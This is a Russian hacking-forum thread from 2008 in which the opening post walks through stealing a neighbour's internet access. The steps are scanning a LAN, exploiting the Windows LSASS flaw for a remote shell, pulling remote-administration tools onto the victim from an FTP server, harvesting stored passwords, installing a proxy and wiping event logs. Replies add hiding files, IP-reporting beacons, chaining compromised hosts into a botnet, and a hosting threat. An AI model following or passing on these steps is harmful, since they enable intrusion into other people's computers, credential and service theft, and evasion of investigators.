Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Халявный Интернет (для маленьких) (https://forum.antichat.xyz/showthread.php?t=95505)

stopxaker 09.12.2008 06:00

Халявный Интернет (для взрослых и немощных )
 
Начну с того , что мне уже порядком недоели темы на форуме , типо "Халявный инет" и тд и тп .


С этой статье я приведу примеры (Гуру идут лесом ;) ) как можно найти этот самый халявный инетернет , но помните это плохо , и уголовнонаказуемо !!! :mad:

Начну с того , что инет можно добыть несколькими способами , первый это настоящий взлом , второй способ это впарить жертве трояна , заманить на заражённую ссылку с эксплойтом и тд , и третий прийти к жертве и в наглую поставить ему прокси и юзать его инет !:D

Бредисловие

В недавном прошлом , на многих компьютерах стояли , Windows 2000 , Windows XP Home , Windows XP Pro sp1 , так вот все они были уязвимы и взламать их можно было посредством эксплойта SmallSoft Lsa Service Exploit или lsa.exe , этот эксплойт старый и использует уязвимость в lsass.exe, кстати в некоторых сетях до сих пор есть такие машины, которые уязвимы , толи люди не знают про sp2 , sp3 , толи просто им просто лень ставить hotfixы и закрыть 445 порт , хз , мол работает комп, да и ладно :D

Ну... полетели

Скачиваем сканер портов Angry IP Scanner идём в настройки , и прописываем порты 21,22,135,138,139,445,1025,4489,3389 и тд и тп
Выбираем метод сканирование "Alive hosts (repoding pings only), сохраняем ,затем выбираем IP Range и вбиваем ипы вышей сети , к примеру , а так ипы должны быть вашей сети !!!

Код:

10.0.0.0-255.255.255.255
Начинаем сканировать , вот появились первые клиенты , обращаем внимание на тех у кого больше всего открыто портов , затем берём эксплойт SmallSoft Lsa Service Exploit или lsa.exe и вписываем ip жертвы, тип атаки Shell и жмём Начать
http://stopxaker-com.na.by/images/1178274122_2.jpg


если , уязвимость есть то вы получаете командную строку компьютера жертвы cmd.exe, http://stopxaker-com.na.by/images/2_1.png

то есть вот такое чёрное dos окошечко, если уязвимости нет, окошко повисит и пропадёт и вы идёте лесом :D

ну допустим мы получили shell , теперь вам будет нужно поднять у себя на компьютере FTP-сервер , я выбрал Serv-U

Цитата:

Serv-U представляет собой мощный, гибкий и легкий в установке ftp-сервер для всех платформ Windows. Функции безопасности обеспечиваются паролями и установкой прав на запись, чтение и изменение для каталогов и файлов для каждого пользователя, а также контролем доступа по IP-адресам.
Настроить его сможет даже ребёнок , заливаем к себе на фтп сервер нужные нам для дальнейшей работы файлы , выберем радмин сервер,ccproxy.exe и terminal.exe о нём почитать можно тут это замечательная статья от-=lebed=-, но или любой другой софт который вы используете .

Теперь возвращаемся в наше окошечко с полученным шеллом , и подключаемся к нашему ФТП-серверу

Код:

С:\WINDOWS\ftp
ftp> o
(to)  (ваш ип)
ftp: connect: 127.0.0.1(login): anonymous
pass:Enter

Вошли на свой фтп , и идём в директорую где лежат наши файлы

Код:

dir
команды по работе с фтп вы можете найти у себя в справке и поддержке , достаточно набрать ftp .

Так теперь , закачаем на комп жертвы наши файлы :
PHP код:

get radmin.exe
get terminal
.exe

готово 
выходим 
bye 

идём в директорую куда мы залили наши файлы , лучше выбрать директорую по глубже ;)

С:\WINDOWS\system32 просмотрим командой dir
так... вот они голубчики :
Цитата:

radmin.exe
terminal.exe
запустим их

Код:

С:\WINDOWS\system32\terminal.exe
С:\WINDOWS\system32\radmin.exe

Ну вот и всё ! теперь мы может всё видеть и делать своё темное дело дальше :D

Хочу сказать , что мы произвели честный то есть тру взлом , мы никому ничего не впаривали , то есть нашли уязвимость и честно её юзаем , вывод , челу нужно закрыть 445 порт , поставить или обновить антивирь(кстати он тут не причём , бывали случаи когда на компах стоял KAV6 и при этом можно было приспокойной получить shell) и установить хороший фаерволл !

Летим дальше , думаю вы поняли прочитав статью Лебедя для чего нам нужен terminal.exe , да да да , вот именно , плюс ко всему мы ещё получили бесплатный дедик ! :) так заходим в наш дедик , давайте осмотримся , что тут есть .... угу ... нам нужны пассы от всего что тут есть , скачиваем программу MPR
запускаем смотрим , ага , вот нам и пасс от аськи , веб форм , и пароли от так желаемого нами интернета .

Наступает долгожданный момент !!! Но ... мы понимаем , что если мы сейчас запустим тут инет , то вылетим из локалки или не запустим инет вообще :( , так так так , и тут нам на помощь приходит замечательная программка RASPPPOE_099 идём на офф сайт скачиваем , распаковываем в любую папку , далее идём в Панель Управления>Cетевыe подключение>Подключения по локальной сети>Свойства , там Протокол Интеренета TCP/IP жмём Свойства , и выбираем Протокол=Добавить, далее нажмите кнопку «Установить с Диска». Да чё я тут распинаюсь вот тут можно посмотреть и почитать , там даже с картинками http://www.rdtc.ru/internet_ivd_PPPoE_XP.php3

Так всё готово , бывает что нужно перегрузиться , но в большенстве случаев этого можно и не делать !

И вот мы уже юзаем чужой инет :( , стыдно ? конечно стыдно и тем более за это есть статья !!! ПОМНИТЕ ОБ ЭТОМ ! не стоит этот всех этих усилий , тем более ,что анлим сейчас стоит копейки !!!

Ну что теперь осталось скачать любой прокси сервер , установить его на компе жертвы , вернуться к себе , затем в FireFox>Инстументы>Настройки>Допо нительно>Network=Settings=Manual Proxy configuration , вписываем ип жертвы и порт нашего прокси сервера . И радуемся чужому инету :D

Потом если у жертвы анлим , то можно уже с его компа производить сканирование портов и дальнейшие взломы , а вот ещё чуть не забыл , чтобы не палится нужно чистить лог , зайдите сюда C:\WINDOWS\system32\config , AppEvent.Evt , SecEvent.Evt и тд , и удалите их на фиг , если будут проблемы с удалением и чисткой , скачайте Unlocker и он поможет решить все ваши проблемы .

Если кому в лом искать и качать данный софт , залил Вот всё в одном флаконе !!! terminal.exe KAV_keygen=радмин, ipscan и старый сплойт , в архиве lsa.rar, RASPPPOE_099.ZIP,CCProxy.rar, Keygen KAV_all.exe=радмин-сервер , хочу заметить , что пинчей и всякой прочей лабуду в этих файла нет , отмечу что на CCProxy.ехе после обработки его Reshackom стал рычать на него Nod 32 , с радмином я думаю всё тоже ясно , но по крайне мере это юзалось , то однин Каспер на него повизгивал и тогда когда конектишься к нему через TELNET , мол атака RootShell , Telminal.exe тоже не буду выкладывать , сначало почитайте статью Лебедя -=lebed=-тут там и скачаете Terminal.exe , MPR тоже выкладывать не буду потому что на него рычат антивири , мол Троян PWS , чтобы потом не было предъяв , мол я кому то троя пытался впарить !!!

Послесловие :

Надеюсь после этой статейки , больше не будет тем " Халявный Инет и тд и тп "(стану модером буду банить за такие топы :D ) и помните это уголовнонаказуемо и противозаконно ! не
использовать на практике !!!!


Всего всем доброго , удачи ;)

http://stopxaker.com

-m0rgan- 09.12.2008 09:53

Познавательно..., лови +2 )

stopxaker 10.12.2008 00:17

Цитата:

Сообщение от -m0rgan-
Познавательно..., лови +2 )

Спасибо :) , но у меня есть одна проблема , блин теряю компы :( , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать

satana8920 10.12.2008 00:26

ппц нах его доставать он стал уже настока дешевым и доступным до неприличия просто
а уж еси так вам приспичило то пинч решит любую вашу проблему (ну почти)

ппц нах статью еще писать

Цитата:

Бредисловие
убило вообще

-=lebed=- 10.12.2008 00:56

Да, именно так просто всё и было... когда-то - настальжи... Вспомним ещё авторутер KAHT2 который проходился по диапазонам IP и напоровшись на дырявую винду давал CMD-шелл. :)
P.S. Флейм в разделе запрещён!

St0nX 10.12.2008 13:18

Проще написать проксю и впарить. А это уже года 2 - 3 как не актуально.

NeXArmAor 10.12.2008 13:26

Цитата:

Сообщение от stopxaker
Спасибо :) , но у меня есть одна проблема , блин теряю компы :( , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать

Есть такая прога у меня. Отсылает на mail каждые 10 минут IP адрес компа.

Kluivert 10.12.2008 17:28

Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.

stopxaker 10.12.2008 22:27

Цитата:

Сообщение от Kluivert
Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.

Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею ! ;)

ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу

Цитата:

Access forbidden! You don't have permission to access the requested object. It is either read-protected or not readable by the server.
бла бла

внизу написанно

Цитата:

Error Wed Dec 10 21:21:08 2008 Apache/2.2.4 (Linux/SUSE)
но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался ! :rolleyes:

Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)

Tigger 10.12.2008 22:46

Норм статья))

snipero4ek 10.12.2008 23:55

Думаю лучше заплатить денег, не советую лазить под другими акками из сети,у самого забирали за это комп,хорошо что всё прошло благополучно..

stopxaker 11.12.2008 11:19

Цитата:

Сообщение от snipero4ek
Думаю лучше заплатить денег, не советую лазить под другими акками из сети,у самого забирали за это комп,хорошо что всё прошло благополучно..

Ты прав , но согласись , чтобы знать как защитить систему , нужно в первую очередь знать , как её взломать ! ;)

zL0Bniy keNt 14.12.2008 15:39

Ты очень сильно помог,я с другом поспорил он проиграл,я с этого 1кес поимел,лови за это плюсик+!

Brytis 16.12.2008 21:05

Статья хорошо написана, но она не актуальна, я так и некого не нашол с sp1 ) тебе +1

Diam0nd 17.12.2008 16:57

Отличная статья! Спасибо!

Brytis 17.12.2008 21:43

Выложите пожалуйста сервер радмина, и ешё почему в cmd не распаковываются файлы в .exe ?

Buffalon 17.12.2008 22:35

Цитата:

Сообщение от stopxaker
Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею ! ;)

ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу



бла бла

внизу написанно



но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался ! :rolleyes:

Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)

:D .Прикалываешься что ле???

Sn0wSky 17.12.2008 23:20

StopXakep, во-первых... одно слово в твоем нике те не подходит
во-вторых... я тебе помогу, когда:

1. Стану экспертом
2. Вылезу из под стола :))))))))))))))))))))))))





P.S Ктулху среди нас O_o

stopxaker 17.12.2008 23:42

Цитата:

Сообщение от Brytis
Выложите пожалуйста сервер радмина, и ешё почему в cmd не распаковываются файлы в .exe ?

Сервер радмина я выкладывал тут смотри вложение soft_all.zip там terminal.exe, keygen_KAV_all.exe, lsa.exe , keygen_KAV_all.exe это и есть сервер радмина !!!! Думаю с этим понятно , теперь с файлами .ехе через сmd , поясню значит так для начала , нужно подключится к своему радмину , через телнет , затем перейти в нужную вам директорию , например я люблю прятать файлы в C:\WINDOWS\system32\spool\drivers\w32x86 уж в неё точно обычный юзер не станет смотреть , ну а новичку у которых
Цитата:

Сообщение от Brytis
почему в cmd не распаковываются файлы в .exe ?

нужно , вот ты попал в телнет по средством радмина тот же cmd

Код:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Documents and Settings\Admin>

далее набираешь команду cd\

и переходишь вот сюда

Код:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Documents and Settings\Admin>cd\

C:\>

вот , потом конектишься к своему радмину в режиме "Передача файлов" и заливаешь на диск С:\ свои файлы , и просматриваешь их командой dir

Код:

C:\>dir
 Том в устройстве C не имеет метки.
 Серийный номер тома: XXX-XXX

 Содержимое папки C:\

15.12.2008  19:47                0 AUTOEXEC.BAT
15.12.2008  19:47                0 CONFIG.SYS
16.12.2008  11:20    <DIR>          Documents and Settings
21.03.2007  14:39            4*740 key.bat
14.09.2007  13:29          787*423 keygen_KAV_all.exe
05.11.2007  12:17          837*640 mpr103nulled.exe
28.01.2008  03:29          784*421 mpr103nulled.rar
17.12.2008  12:41    <DIR>          Program Files
14.09.2007  13:29          787*423 system.exe
21.03.2007  01:00          198*143 terminal.exe
17.12.2008  12:42    <DIR>          WINDOWS
17.12.2008  22:37    <DIR>          Новая папка
              8 файлов      3*399*790 байт
              4 папок  2*078*269*440 байт свободно

C:\>

потом выбираете свой файл и запускаете его

C:\>system.exe Enter

Думаю теперь всё будет ясно !!!

ps отписал это специально для того , чтобы впредь не было таких вопросов ;)

moob 19.12.2008 06:39

Хмм
А службы не зависят?

А то атака проходит а подключиться все равно нельзя

stopxaker 19.12.2008 07:26

Цитата:

Сообщение от moob
Хмм
А службы не зависят?

Какие службы ? можно по конкретнее ?


Цитата:

Сообщение от moob
А то атака проходит а подключиться все равно нельзя

Это ты про что ? уточни плиз :)

Carnivore.Sys 19.12.2008 09:30

Самое смешное для меня когда сажают на зону каких то жмуриков которые вот так вот интернет крысили...позорище просто такой фигней страдать.

chekist 19.12.2008 20:50

тем кто всё таки решил поюзать халявный инет, вам сюда http://forum.antichat.ru/thread73961.html

Brytis 19.12.2008 22:07

А если просто по компу жертвы бродить, пароли там посмотреть, но инетом жертвы не пользоваться, тогда могут какнить к отвецтвенности привлеч?

Belfigor 19.12.2008 22:12

Цитата:

Сообщение от Brytis
А если просто по компу жертвы бродить, пароли там посмотреть, но инетом жертвы не пользоваться, тогда могут какнить к отвецтвенности привлеч?

Могут , проникновение в частную собственность , это всё равно , что ты залез в чужую квартиру , и шаришся в вещах этого человека , но я думаю , что всё это хрень ;)
и это просто улыбнуло http://forum.antichat.ru/thread73961.html
Не нашей власти и не нашим ментам открывать рот , пусть сначало дадут людям нормальную зарплату , пенсии и тд и тп, а потом уже занимаются преступлениями в отрасли ИТ !

Brytis 19.12.2008 22:29

Не ну мне просто интересно, кто будет это отслеживать? Были ли случаи поимки))

chekist 19.12.2008 22:52

Цитата:

Сообщение от Brytis
Не ну мне просто интересно, кто будет это отслеживать? Были ли случаи поимки))

знакомый работает в ЦТ, вычисляют они таких умников быстро (при условии что была заявка от потерпевшего)
, одному дали 3 года условно.

Belfigor 19.12.2008 22:57

Цитата:

Сообщение от Brytis
Не ну мне просто интересно, кто будет это отслеживать? Были ли случаи поимки))

При хорошо организованной атаке практически не возможно , я не думаю что ТС этой статьей призывает таким способом добывать себе инет , ни в коем случае , инет сейчас очень дешёвый и выделить 500р в месяц на безлим , это копейки , имхо, скорей всего это очень хороший способ добывания дедиков !

Например: допустим у нас есть цель провести серьёзную атаку на какой нибудь ресурс , допустим мы взломали 5 машин , у нас есть 5 дедиков , на них мы также можем установить прокси и соксы , затем , мы из одного дедика заходим в другой из другого в третий из третьего в четвёртый , + каскадые прокси и вот уже можно проводить атаку хоть на Белый Дом и Майкрософт , а если у нас в есть в наличии больше 30 взломанных машин , то можно организовать не плохой ботнет , да и вообще возможностей становиться масса , самое главное чистить логи , а свой плацдарм лучше держать на флеше или же на жестком диске размером не больше 40 гигив , чтобы в любой момент всё это хозяйство можно было спокойно выкинуть в окно ;)
А палиться , добывая таким способом инет , чтобы посидеть в контакте или скачать какой нить фильм , имхо не стоит !!!!

Belfigor 19.12.2008 23:01

Цитата:

Сообщение от chekist
знакомый работает в ЦТ, вычисляют они таких умников быстро (при условии что была заявка от потерпевшего)
, одному дали 3 года условно.

Не думаю , ТС пишет , что инет то он поднимает уже на машине атакуемого , значит дозвон до прова идёт с его машины с родными паролями без проблем , с другой стороны конечно можно , но это нужно снифать трафик , смотреть куда идут пакеты и тд и то если

Цитата:

Сообщение от chekist
(при условии что была заявка от потерпевшего)

;)

chekist 19.12.2008 23:13

Цитата:

Сообщение от Belfigor
с другой стороны конечно можно , но это нужно снифать трафик , смотреть куда идут пакеты и тд

Мой провайдер логи долго хранит. Сеструха как то подцепила спам бота, трафика накрутило месяца на 2 вперед, по этому поводу обратился только через 3 недели, так они за час нашли IP с которого шли команды для бота, потом пошли жестокие абузы на этот апишник.

Belfigor 19.12.2008 23:16

Цитата:

Сообщение от chekist
Мой провайдер логи долго хранит. Сеструха как то подцепила спам бота, трафика накрутило месяца на 2 вперед, по этому поводу обратился только через 3 недели, так они за час нашли IP с которого шли команды для бота, потом пошли жестокие абузы на этот апишник.

Добре , а где гарантия , что тот IP тоже не жертва

chekist 19.12.2008 23:24

Цитата:

Сообщение от Belfigor
Добре , а где гарантия , что тот IP тоже не жертва

ну покрайней мере сервер управления накрыли, это уже не моя инициатива была, я просто знакомово попросил чтобы он посмотрел что это за зверек был, так как этот паразит не оставил следов, видимо жил тока в аперативе.

fafati 21.12.2008 08:35

stopxaker УРОД !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! тебе **** пиздец !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

УДАЛЯЙ ЭТО БЛЯ ПОКА НЕ ПОЗДНО !!!!!!!!!!

stopxaker 21.12.2008 08:47

Цитата:

Сообщение от fafati
stopxaker УРОД !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! тебе **** пиздец !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

УДАЛЯЙ ЭТО БЛЯ ПОКА НЕ ПОЗДНО !!!!!!!!!!

Модеры угомоните этого полоумного !!!!

ps: я тебе уже отписал !!!

Цитата:

ааааа , у нас с тобой один хостер , так вот Ламо , не фиг пользоваться шеллом , если не умеешь юзать фтп , а если и оставляешь шелл , то ставь на его права !!!!!!!! и не фиг тут кипешь поднимать !!!!!!!!!

fafati 21.12.2008 08:50

Я тебе сказал , молись **** !!!! или удаяй это хрень
Цитата:

All rights reserved by StopXaker ;)))) anichat-rullezzzz
, и живи дальше спокойной на своём ебучем античате бля !!! :mad:

stopxaker 21.12.2008 08:55

Цитата:

Сообщение от fafati
Я тебе сказал , молись **** !!!! или удаяй это хрень , и живи дальше спокойной на своём ебучем античате бля !!! :mad:

ууу , это перебор !!! зря ты это написал !!!! ;)

stopxaker 21.12.2008 10:41

Цитата:

Сообщение от fafati
Да что вы в самом деле этот сайт захотела сделать моя сестра , я ей помогал ,:(((

НУ смотри поверю на слово !!! смотри тут /public_html/includes/config.php , и ещё раз говорю тебе убире свой шелл ! и юзай всё это дело через ftp


ps Модеры удалите плиз оффтоп !!!

stopxaker 22.12.2008 12:24

Модераторы , удалите оффтоп до во этой месаги ! please

Цитата:

Сообщение от chekist
ну покрайней мере сервер управления накрыли, это уже не моя инициатива была, я просто знакомово попросил чтобы он посмотрел что это за зверек был, так как этот паразит не оставил следов, видимо жил тока в аперативе.


WALKMAN 05.01.2009 13:29

У меня вопрос по теме, в локалке имееться доступ к машине, на которой есть инет, так вот нужно поставить прокси чтобы скрывался и ставился в автозапуск, ну короче чтобы хозяин ничего незналюю
Какой прокси сервер годиться для такой цели?

WALKMAN 05.01.2009 21:33

Ответ нашел сам, извеняюсь...
Ответ вот: http://forum.antichat.ru/threadnav77503-1-10.html - Автозагрузка 3proxy и др. через службы


Время: 18:18